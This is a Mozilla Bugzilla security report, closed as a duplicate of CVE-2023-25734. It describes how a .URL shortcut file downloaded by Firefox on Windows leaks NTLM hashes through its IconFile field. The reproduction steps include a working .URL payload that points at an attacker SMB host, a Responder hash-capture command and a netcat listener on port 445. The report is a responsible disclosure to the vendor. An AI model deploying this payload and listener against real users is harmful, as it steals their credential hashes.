Closed
Bug 1812338
Opened 1 year ago
Closed 1 year ago
.URL file can also send NTLM hashes
Categories
(Firefox :: Security, defect)
Firefox
Security
Tracking
()
RESOLVED
DUPLICATE
of bug 1809923
People
(Reporter: haxatron1, Unassigned)
Details
(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
Attachments
(1 file)
4.76 MB,
video/webm
|
Details |
On Windows, .URL file can also send NTLM hashes via the IconFile parameter. Thus it is possible to reproduce https://bugzilla.mozilla.org/show_bug.cgi?id=1773894 using .URL file
Flags: sec-bounty?
STR
- Host example.url on a server
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
[InternetShortcut]
IDList=
URL=\192.168.1.109\test\test.ico
IconFile=\192.168.1.109\test\test.ico
HotKey=0
- Replace all instances of 192.168.1.109 with your responder IP address.
- Start responder using responder -I eth0 -wvd
- Create a link that download example.url, see that example.url is downloaded by Firefox without any warning, click Show in Folder and the hash is leaked.
Alternatively, if you don't want to download responder, you may also verify that .url files are sending the hash.
Instead of Step 2, you can start a netcat server using
nc -nvlp 445
And when you download example.url and click Show in Folder a connection to your netcat server is made. On Windows, SMB connection will result in auto-forwarding NTLM hash.
Updated•1 year ago
|
Status: UNCONFIRMED → RESOLVED
Closed: 1 year ago
Duplicate of bug: CVE-2023-25734
Resolution: --- → DUPLICATE
Updated•1 year ago
|
Flags: sec-bounty? → sec-bounty-
Updated•8 months ago
|
Group: firefox-core-security
Updated•27 days ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•